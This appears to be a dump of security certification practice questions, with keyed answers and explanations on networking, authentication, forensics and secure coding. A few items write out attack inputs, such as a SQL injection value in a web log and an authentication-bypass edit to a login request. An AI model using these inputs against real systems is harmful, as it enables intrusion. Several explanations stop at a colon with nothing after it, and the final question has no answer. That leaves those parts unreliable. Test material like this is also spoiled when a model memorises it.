Answer: C Explanation: Access Control Lists (ACLs) are used to restrict access to the console of a virtual host. Virtual hosts are often managed by centralized management servers (for example: VMware vCenter Server). You can create logical containers that can contain multiple hosts and you can configure ACLs on the containers to provide access to the hosts within the container.

QUESTION NO: 92 A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally developed. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability, stability, and performance. Which of the following would provide the MOST thorough testing and satisfy the CEO's requirements? A. Sign a MOU with a marketing firm to preserve the company reputation and use in-house resources for random testing. B. Sign a BPA with a small software consulting firm and use the firm to perform Black box testing and address all findings. C. Sign a NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings. D. Use the most qualified and senior developers on the project to perform a variety of White box testing and code reviews.

Answer: C Explanation: Gray box testing has limited knowledge of the system as an attacker would. The base code would remain confidential. This would further be enhanced by a Non-disclosure agreement (NDA) which is designed to protect confidential information.

QUESTION NO: 51 An educational institution would like to make computer labs available to remote students. The labs are used for various IT networking, security, and programming courses. The requirements are: Each lab must be on a separate network segment. Labs must have access to the Internet, but not other lab networks. Student devices must have network access, not simple access to hosts on the lab networks. Students must have a private certificate installed before gaining access. Servers must have a private certificate installed locally to provide assurance to the students. All students must use the same VPN connection profile. Which of the following components should be used to achieve the design in conjunction with directory services? A. L2TP VPN over TLS for remote connectivity, SAML for federated authentication, firewalls between each lab segment B. SSL VPN for remote connectivity, directory services groups for each lab group, ACLs on routing equipment C. IPSec VPN with mutual authentication for remote connectivity, RADIUS for authentication, ACLs on network equipment D. Cloud service remote access tool for remote connectivity, OAuth for authentication, ACL on routing equipment

Answer: C Explanation: IPSec VPN with mutual authentication meets the certificates requirements. RADIUS can be used with the directory service for the user authentication. ACLs (access control lists) are the best solution for restricting access to network hosts.

QUESTION NO: 53 A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concerned about the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of using presence technology? A. Insider threat B. Network reconnaissance C. Physical security D. Industrial espionage

Answer: C Explanation: If all company users worked in the same office with one corporate network and using company supplied laptops, then it is easy to implement all sorts of physical security controls. Examples of physical security include intrusion detection systems, fire protection systems, surveillance cameras or simply a lock on the office door. However, in this question we have dispersed employees using their own devices and frequently traveling internationally. This makes it extremely difficult to implement any kind of physical security. Physical security is the protection of personnel, hardware, programs, networks, and data from physical circumstances and events that could cause serious losses or damage to an enterprise, agency, or institution. This includes protection from fire, natural disasters, burglary, theft, vandalism, and terrorism.

QUESTION NO: 6 After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart. SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT); The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DDYYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items? A. Input validation B. SQL injection C. TOCTOU D. Session hijacking

Answer: C Explanation: In this question, TOCTOU is being exploited to allow the user to modify the temp file that contains the price of the item. In software development, time of check to time of use (TOCTOU) is a class of software bug caused by changes in a system between the checking of a condition (such as a security credential) and the use of the results of that check. This is one example of a race condition. A simple example is as follows: Consider a Web application that allows a user to edit pages, and also allows administrators to lock pages to prevent editing. A user requests to edit a page, getting a form which can be used to alter its content. Before the user submits the form, an administrator locks the page, which should prevent editing. However, since editing has already begun, when the user submits the form, those edits (which have already been made) are accepted. When the user began editing, the appropriate authorization was checked, and the user was indeed allowed to edit. However, the authorization was used later, at a time when edits should no longer have been allowed. TOCTOU race conditions are most common in Unix between operations on the file system, but can occur in other contexts, including local sockets and improper use of database transactions.

QUESTION NO: 76 The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement? A. Avoid B. Accept C. Mitigate D. Transfer

Answer: C Explanation: Mitigation means that a control is used to reduce the risk. In this case, the control is training.

QUESTION NO: 82 A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. This requirement is BEST described as an implementation of: A. an administrative control B. dual control C. separation of duties D. least privilege E. collusion

Answer: C Explanation: Separation of duties requires more than one person to complete a task.

QUESTION NO: 21 A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen. The code ensures that only the upper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator is concerned with the following web server log: 10.235.62.11 - - [02/Mar/2014:06:13:04] "GET /site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1" 200 5724 Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer? A. The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters. B. The security administrator is concerned with XSS, and the developer should normalize Unicode characters on the browser side. C. The security administrator is concerned with SQL injection, and the developer should implement server side input validation. D. The security administrator is concerned that someone may log on as the administrator, and the developer should ensure strong passwords are enforced.

Answer: C Explanation: The code in the question is an example of a SQL Injection attack. The code '1=1' will always provide a value of true. This can be included in statement designed to return all rows in a SQL table. In this question, the administrator has implemented client-side input validation. Client-side validation can be bypassed. It is much more difficult to bypass server-side input validation. SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

QUESTION NO: 99 An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost. After memory, which of the following BEST represents the remaining order of volatility that the investigator should follow? A. File system information, swap files, network processes, system processes and raw disk blocks. B. Raw disk blocks, network processes, system processes, swap files and file system information. C. System processes, network processes, file system information, swap files and raw disk blocks. D. Raw disk blocks, swap files, network processes, system processes, and file system information.

Answer: C Explanation: The order in which you should collect evidence is referred to as the Order of volatility. Generally, evidence should be collected from the most volatile to the least volatile. The order of volatility from most volatile to least volatile is as follows:

QUESTION NO: 83 The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management's directives? A. Develop an information classification scheme that will properly secure data on corporate systems. B. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment. C. Publish a policy that addresses the security requirements for working remotely with company equipment. D. Work with mid-level managers to identify and document the proper procedures for telecommuting.

Answer: C Explanation: The question states that "the organization has not addressed telecommuting in the past". It is therefore unlikely that a company policy exists for telecommuting workers. There are many types of company policies including Working time, Equality and diversity, Change management, Employment policies, Security policies and Data Protection policies. In this question, a new method of working has been employed: remote working or telecommuting. Policies should be created to establish company security requirements (and any other requirements) for users working remotely.

QUESTION NO: 34 Ann is testing the robustness of a marketing website through an intercepting proxy. She has intercepted the following HTTP request: POST /login.aspx HTTP/1.1 Host: comptia.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass? A. Remove all of the post data and change the request to /login.aspx from POST to GET B. Attempt to brute force all usernames and passwords using a password cracker C. Remove the txtPassword post data and change alreadyLoggedIn from false to true D. Remove the txtUsername and txtPassword post data and toggle submit from true to false

Answer: C Explanation: The text "txtUsername=ann&txtPassword=ann" is an attempted login using a username of 'ann' and also a password of 'ann'. The text "alreadyLoggedIn=false" is saying that Ann is not already logged in. To test whether we can bypass the authentication, we can attempt the login without the password and we can see if we can bypass the 'alreadyloggedin' check by changing alreadyLoggedIn from false to true. If we are able to log in, then we have bypassed the authentication check.

QUESTION NO: 66 A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization's customer database. The database will be accessed by both the company's users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO). A. Physical penetration test of the datacenter to ensure there are appropriate controls. B. Penetration testing of the solution to ensure that the customer data is well protected. C. Security clauses are implemented into the contract such as the right to audit. D. Review of the organizations security policies, procedures and relevant hosting certifications. E. Code review of the solution to ensure that there are no back doors located in the software.

Answer: C,D Explanation: Due diligence refers to an investigation of a business or person prior to signing a contract. Due diligence verifies information supplied by vendors with regards to processes, financials, experience, and performance. Due diligence should verify the data supplied in the RFP and concentrate on the following:

QUESTION NO: 56 A network engineer wants to deploy user-based authentication across the company's wired and wireless infrastructure at layer 2 of the OSI model. Company policies require that users be centrally managed and authenticated and that each user's network access be controlled based on the user's role within the company. Additionally, the central authentication system must support hierarchical trust and the ability to natively authenticate mobile devices and workstations. Which of the following are needed to implement these requirements? (Select TWO). A. SAML B. WAYF C. LDAP D. RADIUS E. Shibboleth F. PKI

Answer: C,D Explanation: RADIUS is commonly used for the authentication of WiFi connections. We can use LDAP and RADIUS for the authentication of users and devices. LDAP and RADIUS have something in common. They are both mainly protocols (more than a database) which uses attributes to carry information back and forth. They are clearly defined in RFC documents so you can expect products from different vendors to be able to function properly together. RADIUS is NOT a database. It's a protocol for asking intelligent questions to a user database. LDAP is just a database. In recent offerings it contains a bit of intelligence (like Roles, Class of Service and so on) but it still is mainly just a rather stupid database. RADIUS (actually RADIUS servers like FreeRADIUS) provide the administrator the tools to not only perform user authentication but also to authorize users based on extremely complex checks and logic. For instance you can allow access on a specific NAS only if the user belongs to a certain category, is a member of a specific group and an outside script allows access. There's no way to perform any type of such complex decisions in a user database.

QUESTION NO: 100 A company has noticed recently that its corporate information has ended up on an online forum. An investigation has identified that internal employees are sharing confidential corporate information on a daily basis. Which of the following are the MOST effective security controls that can be implemented to stop the above problem? (Select TWO). A. Implement a URL filter to block the online forum B. Implement NIDS on the desktop and DMZ networks C. Security awareness compliance training for all employees D. Implement DLP on the desktop, email gateway, and web proxies E. Review of security policies and procedures

Answer: C,D Explanation: Security awareness compliance training for all employees should be implemented to educate employees about corporate policies and procedures for working with information technology (IT). Data loss prevention (DLP) should be implemented to make sure that users do not send sensitive or critical information outside the corporate network.

QUESTION NO: 19 A security administrator is shown the following log excerpt from a Unix system: 2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2 2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2 2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2 2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2 2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2 Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO). A. An authorized administrator has logged into the root account remotely. B. The administrator should disable remote root logins. C. Isolate the system immediately and begin forensic analysis on the host. D. A remote attacker has compromised the root account using a buffer overflow in sshd. E. A remote attacker has guessed the root password using a dictionary attack. F. Use iptables to immediately DROP connections from the IP 198.51.100.23. G. A remote attacker has compromised the private key of the root account. H. Change the root password immediately to a password not found in a dictionary.

Answer: C,E Explanation: The log shows six attempts to log in to a system. The first five attempts failed due to 'failed password'. The sixth attempt was a successful login. Therefore, the MOST likely explanation of what is occurring is that a remote attacker has guessed the root password using a dictionary attack. The BEST immediate response is to isolate the system immediately and begin forensic analysis on the host. You should isolate the system to prevent any further access to it and prevent it from doing any damage to other systems on the network. You should perform a forensic analysis on the system to determine what the attacker did on the system after gaining access.

QUESTION NO: 88 After the install process, a software application executed an online activation process. After a few months, the system experienced a hardware failure. A backup image of the system was restored on a newer revision of the same brand and model device. After the restore, the specialized application no longer works. Which of the following is the MOST likely cause of the problem? A. The binary files used by the application have been modified by malware. B. The application is unable to perform remote attestation due to blocked ports. C. The restored image backup was encrypted with the wrong key. D. The hash key summary of hardware and installed software no longer match.

Answer: D Explanation: Different software vendors have different methods of identifying a computer used to activate software. However, a common component used in software activations is a hardware key (or hardware and software key). This key is a hash value generated based on the hardware (and possibly software) installed on the system. For example, when Microsoft software is activated on a computer, the software generates an installation ID that consists of the software product key used during the installation and a hardware key (hash value generated from the computer's hardware). The installation ID is submitted to Microsoft for software activation. Changing the hardware on a system can change the hash key which makes the software think it is installed on another computer and is therefore not activated for use on that computer. This is most likely what has happened in this question.

QUESTION NO: 84 A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following could reduce the overall risk to the company from this issue? A. Establish a policy that only allows filesystem encryption and disallows the use of individual file encryption. B. Require each user to log passwords used for file encryption to a decentralized repository. C. Permit users to only encrypt individual files using their domain password and archive all old user passwords. D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.

Answer: D Explanation: Electronic discovery (also called e-discovery) refers to any process in which electronic data is sought, located, secured, and searched with the intent of using it as evidence in a civil or criminal legal case. E-discovery can be carried out offline on a particular computer or it can be done in a network. An e-discovery policy would define how data is archived and encrypted. If the data is archived in an insecure manor, a user could be able to delete data that the user does not want to be searched. Therefore, we need to find a way of securing the data in a way that only authorized people can access the data. A public key infrastructure (PKI) supports the distribution and identification of public encryption keys for the encryption of data. The data can only be decrypted by the private key. In this question, we have an escrowed corporate PKI. Escrow is an independent and licensed third party that holds something (money, sensitive data etc.) and releases it only when predefined conditions have been met. In this case, Escrow is holding the private key of the PKI. By encrypting the e-discovery data by using the PKI public key, we can ensure that the data can only be decrypted by the private key held in Escrow and this will only happen when the predefined conditions are met.

QUESTION NO: 13 An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure? A. Replicate NAS changes to the tape backups at the other datacenter. B. Ensure each server has two HBAs connected through two routes to the NAS. C. Establish deduplication across diverse storage paths. D. Establish a SAN that replicates between datacenters.

Answer: D Explanation: A SAN is a Storage Area Network. It is an alternative to NAS storage. SAN replication is a technology that replicates the data on one SAN to another SAN; in this case, it would replicate the data to a SAN in the backup datacenter. In the event of a disaster, the SAN in the backup datacenter would contain all the data on the original SAN. Array-based replication is an approach to data backup in which compatible storage arrays use built-in software to automatically copy data from one storage array to another. Array-based replication software runs on one or more storage controllers resident in disk storage systems, synchronously or asynchronously replicating data between similar storage array models at the logical unit number (LUN) or volume block level. The term can refer to the creation of local copies of data within the same array as the source data, as well as the creation of remote copies in an array situated off site.

QUESTION NO: 30 An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. In order to reduce costs and administrative overhead, the security architect wants to outsource identity proofing and second factor digital delivery to the third party. Which of the following solutions will address the enterprise requirements? A. Implementing federated network access with the third party. B. Using a HSM at the network perimeter to handle network device access. C. Using a VPN concentrator which supports dual factor via hardware tokens. D. Implementing 802.1x with EAP-TTLS across the infrastructure.

Answer: D Explanation: IEEE 802.1X (also known as Dot1x) is an IEEE Standard for Port-based Network Access Control (PNAC). It is part of the IEEE 802.1 group of networking protocols. It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN. 802.1X authentication involves three parties: a supplicant, an authenticator, and an authentication server. The supplicant is a client device (such as a laptop) that wishes to attach to the LAN/WLAN - though the term 'supplicant' is also used interchangeably to refer to the software running on the client that provides credentials to the authenticator. The authenticator is a network device, such as an Ethernet switch or wireless access point; and the authentication server is typically a host running software supporting the RADIUS and EAP protocols. The authenticator acts like a security guard to a protected network. The supplicant (i.e., client device) is not allowed access through the authenticator to the protected side of the network until the supplicant's identity has been validated and authorized. An analogy to this is providing a valid visa at the airport's arrival immigration before being allowed to enter the country. With 802.1X portbased authentication, the supplicant provides credentials, such as user name/password or digital certificate, to the authenticator, and the authenticator forwards the credentials to the authentication server for verification. If the authentication server determines the credentials are valid, the supplicant (client device) is allowed to access resources located on the protected side of the network. EAP-TTLS (Tunneled Transport Layer Security) is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each user be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates.

QUESTION NO: 41 A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls. The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be implemented to enable stateless communication? A. Generate a one-time key as part of the device registration process. B. Require SSL between the mobile application and the web services gateway. C. The jsession cookie should be stored securely after authentication. D. Authentication assertion should be stored securely on the client.

Answer: D Explanation: JSON Web Tokens (JWTs) are a great mechanism for persisting authentication information in a verifiable and stateless way, but that token still needs to be stored somewhere. Login forms are one of the most common attack vectors. We want the user to give us a username and password, so we know who they are and what they have access to. We want to remember who the user is, allowing them to use the UI without having to present those credentials a second time. And we want to do all that securely. How can JWTs help? The traditional solution is to put a session cookie in the user's browser. This cookie contains an identifier that references a "session" in your server, a place in your database where the server remembers who this user is. However there are some drawbacks to session identifiers: JWTs address all of these concerns by being a self-contained, signed, and stateless authentication assertion that can be shared amongst services with a common data format. JWTs are self-contained strings signed with a secret key. They contain a set of claims that assert an identity and a scope of access. They can be stored in cookies, but all those rules still apply. In fact, JWTs can replace your opaque session identifier, so it's a complete win. To store JWTs in the browser, use cookies, with the HttpOnly; Secure flags. This will allow the browser to send along the token for authentication purposes, but won't expose it to the JavaScript environment.

QUESTION NO: 80 An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy continuous monitoring of authorized information systems? A. Independent verification and validation B. Security test and evaluation C. Risk assessment D. Ongoing authorization

Answer: D Explanation: Ongoing assessment and authorization is often referred to as continuous monitoring. It is a process that determines whether the set of deployed security controls in an information system continue to be effective with regards to planned and unplanned changes that occur in the system and its environment over time. Continuous monitoring allows organizations to evaluate the operating effectiveness of controls on or near a real-time basis. Continuous monitoring enables the enterprise to detect control failures quickly because it transpires immediately or closely after events in which the key controls are utilized.

QUESTION NO: 61 A new piece of ransomware got installed on a company's backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the deduplication data hard drives. During the incident response, the company finds that all backup tapes for this server are also corrupt. Which of the following is the PRIMARY concern? A. Determining how to install HIPS across all server platforms to prevent future incidents B. Preventing the ransomware from re-infecting the server upon restore C. Validating the integrity of the deduplicated data D. Restoring the data will be difficult without the application configuration

Answer: D Explanation: Ransomware is a type of malware that restricts access to a computer system that it infects in some way, and demands that the user pay a ransom to the operators of the malware to remove the restriction. Since the backup application configuration is not accessible, it will require more effort to recover the data. Eradication and Recovery is the fourth step of the incident response. It occurs before preventing future problems.

QUESTION NO: 9 A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input? A. Client side input validation B. Stored procedure C. Encrypting credit card details D. Regular expression matching

Answer: D Explanation: Regular expression matching is a technique for reading and validating input, particularly in web software. This question is asking about securing input fields where customers enter their credit card details. In this case, the expected input into the credit card number field would be a sequence of numbers of a certain length. We can use regular expression matching to verify that the input is indeed a sequence of numbers. Anything that is not a sequence of numbers could be malicious code.

QUESTION NO: 25 An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate? A. Intermediate Root Certificate B. Wildcard Certificate C. EV x509 Certificate D. Subject Alternative Names Certificate

Answer: D Explanation: Subject Alternative Names let you protect multiple host names with a single SSL certificate. Subject Alternative Names allow you to specify a list of host names to be protected by a single SSL certificate. When you order the certificate, you will specify one fully qualified domain name in the common name field. You can then add other names in the Subject Alternative Names field.

QUESTION NO: 73 A security policy states that all applications on the network must have a password length of eight characters. There are three legacy applications on the network that cannot meet this policy. One system will be upgraded in six months, and two are not expected to be upgraded or removed from the network. Which of the following processes should be followed? A. Establish a risk matrix B. Inherit the risk for six months C. Provide a business justification to avoid the risk D. Provide a business justification for a risk exception

Answer: D Explanation: The Exception Request must include:

QUESTION NO: 15 select id, firstname, lastname from authors User input= firstname= Hack;man lastname=Johnson Which of the following types of attacks is the user attempting? A. XML injection B. Command injection C. Cross-site scripting D. SQL injection

Answer: D Explanation: The code in the question is SQL code. The attack is a SQL injection attack. SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

QUESTION NO: 42 A company that must comply with regulations is searching for a laptop encryption product to use for its 40,000 end points. The product must meet regulations but also be flexible enough to minimize overhead and support in regards to password resets and lockouts. Which of the following implementations would BEST meet the needs? A. A partition-based software encryption product with a low-level boot protection and authentication B. A container-based encryption product that allows the end users to select which files to encrypt C. A full-disk hardware-based encryption product with a low-level boot protection and authentication D. A file-based encryption product using profiles to target areas on the file system to encrypt

Answer: D Explanation: The question is asking for a solution that will minimize overhead and support in regards to password resets and lockouts. File based encryption products operate under the context of the computer user's user account. This means that the user does not need to remember a separate password for the encryption software. If the user forgets his user account password or is locked out due to failed login attempts, the support department can reset his password from a central database of user accounts (such as Active Directory) without the need to visit the user's computer. Profiles can be used to determine areas on the file system to encrypt such as Document folders.

QUESTION NO: 46 ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC counter-based codes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe? A. TOTP B. PAP C. CHAP D. HOTP

Answer: D Explanation: The question states that the HMAC counter-based codes and are valid until they are used. These are "one-time" use codes. HOTP is an HMAC-based one-time password (OTP) algorithm. HOTP can be used to authenticate a user in a system via an authentication server. Also, if some more steps are carried out (the server calculates subsequent OTP value and sends/displays it to the user who checks it against subsequent OTP value calculated by his token), the user can also authenticate the validation server. Both hardware and software tokens are available from various vendors. Hardware tokens implementing OATH HOTP tend to be significantly cheaper than their competitors based on proprietary algorithms. Some products can be used for strong passwords as well as OATH HOTP. Software tokens are available for (nearly) all major mobile/smartphone platforms.

QUESTION NO: 45 A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. The company deploys an enterprise antivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the company implements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reduce malware infection? A. Implement an Acceptable Use Policy which addresses malware downloads. B. Deploy a network access control system with a persistent agent. C. Enforce mandatory security awareness training for all employees and contractors. D. Block cloud-based storage software on the company network.

Answer: D Explanation: The question states that the company implements technical measures to disable external storage. This is storage such as USB flash drives and will help to ensure that the users to do not bring unauthorized data that could potentially contain malware into the network. We should extend this by blocking cloud-based storage software on the company network. This would block access to cloud-based storage services such as Dropbox or OneDrive.

QUESTION NO: 62 The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented? A. Geographical regulation issues, loss of intellectual property and interoperability agreement issues B. Improper handling of client data, interoperability agreement issues and regulatory issues C. Cultural differences, increased cost of doing business and divestiture issues D. Improper handling of customer data, loss of intellectual property and reputation damage

Answer: D Explanation: The risk of security violations or compromised intellectual property (IP) rights is inherently elevated when working internationally. A key concern with outsourcing arrangements is making sure that there is sufficient protection and security in place for personal information being transferred and/or accessed under an outsourcing agreement.

QUESTION NO: 96 During an incident involving the company main database, a team of forensics experts is hired to respond to the breach. The team is in charge of collecting forensics evidence from the company's database server. Which of the following is the correct order in which the forensics team should engage? A. Notify senior management, secure the scene, capture volatile storage, capture non-volatile storage, implement chain of custody, and analyze original media. B. Take inventory, secure the scene, capture RAM, capture hard drive, implement chain of custody, document, and analyze the data. C. Implement chain of custody, take inventory, secure the scene, capture volatile and non-volatile storage, and document the findings. D. Secure the scene, take inventory, capture volatile storage, capture non-volatile storage, document, and implement chain of custody.

Answer: D Explanation: The scene has to be secured first to prevent contamination. Once a forensic copy has been created, an analyst will begin the process of moving from most volatile to least volatile information. The chain of custody helps to protect the integrity and reliability of the evidence by keeping an evidence log that shows all access to evidence, from collection to appearance in court.

QUESTION NO: 33 Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO). A. Jailbroken mobile device B. Reconnaissance tools C. Network enumerator D. HTTP interceptor E. Vulnerability scanner F. Password cracker

Answer: D,E Explanation: Communications between a mobile web application and a RESTful application server will use the HTTP protocol. To capture the HTTP communications for analysis, you should use an HTTP Interceptor. To assess the security of the application server itself, you should use a vulnerability scanner. A vulnerability scan is the automated process of proactively identifying security vulnerabilities of computing systems in a network in order to determine if and where a system can be exploited and/or threatened. While public servers are important for communication and data transfer over the Internet, they open the door to potential security breaches by threat agents, such as malicious hackers. Vulnerability scanning employs software that seeks out security flaws based on a database of known flaws, testing systems for the occurrence of these flaws and generating a report of the findings that an individual or an enterprise can use to tighten the network's security. Vulnerability scanning typically refers to the scanning of systems that are connected to the Internet but can also refer to system audits on internal networks that are not connected to the Internet in order to assess the threat of rogue software or malicious employees in an enterprise.

QUESTION NO: 18 At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO). A. Add guests with more memory to increase capacity of the infrastructure. B. A backup is running on the thin clients at 9am every morning. C. Install more memory in the thin clients to handle the increased load while booting. D. Booting all the lab desktops at the same time is creating excessive I/O. E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity. F. Install faster SSD drives in the storage system used in the infrastructure. G. The lab desktops are saturating the network while booting. H. The lab desktops are using more memory than is available to the host systems.

Answer: D,F Explanation: The problem lasts for 10 minutes at 9am every day and has been traced to the lab desktops. This question is asking for the MOST likely cause of the problem. The most likely cause of the problem is that the lab desktops being started at the same time at the beginning of the day is causing excessive disk I/O as the operating systems are being read and loaded from disk storage. The solution is to install faster SSD drives in the storage system that contains the desktop operating systems.

QUESTION NO: 94 Company policy requires that all company laptops meet the following baseline requirements: Software requirements: Antivirus Anti-malware Anti-spyware Log monitoring Full-disk encryption Terminal services enabled for RDP Administrative access for local users Hardware restrictions: Bluetooth disabled FireWire disabled WiFi adapter disabled Ann, a web developer, reports performance issues with her laptop and is not able to access any network resources. After further investigation, a bootkit was discovered and it was trying to access external websites. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO). A. Group policy to limit web access B. Restrict VPN access for all mobile users C. Remove full-disk encryption D. Remove administrative access to local users E. Restrict/disable TELNET access to network resources F. Perform vulnerability scanning on a daily basis G. Restrict/disable USB access

Answer: D,G Explanation: A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or areas of its software that would not otherwise be allowed (for example, to an unauthorized user) while at the same time masking its existence or the existence of other software. A bootkit is similar to a rootkit except the malware infects the master boot record on a hard disk. Malicious software such as bootkits or rootkits typically require administrative privileges to be installed. Therefore, one method of preventing such attacks is to remove administrative access for local users. A common source of malware infections is portable USB flash drives. The flash drives are often plugged into less secure computers such as a user's home computer and then taken to work and plugged in to a work computer. We can prevent this from happening by restricting or disabling access to USB devices.

QUESTION NO: 8 Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue? A. Integer overflow B. Click-jacking C. Race condition D. SQL injection E. Use after free F. Input validation

Answer: E Explanation: Use-After-Free vulnerabilities are a type of memory corruption flaw that can be leveraged by hackers to execute arbitrary code. Use After Free specifically refers to the attempt to access memory after it has been freed, which can cause a program to crash or, in the case of a Use-After-Free flaw, can potentially result in the execution of arbitrary code or even enable full remote code execution capabilities. According to the Use After Free definition on the Common Weakness Enumeration (CWE) website, a Use After Free scenario can occur when "the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process."

QUESTION NO: 29 Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO). A. Synchronous copy of data B. RAID configuration C. Data de-duplication D. Storage pool space allocation E. Port scanning F. LUN masking/mapping G. Port mapping

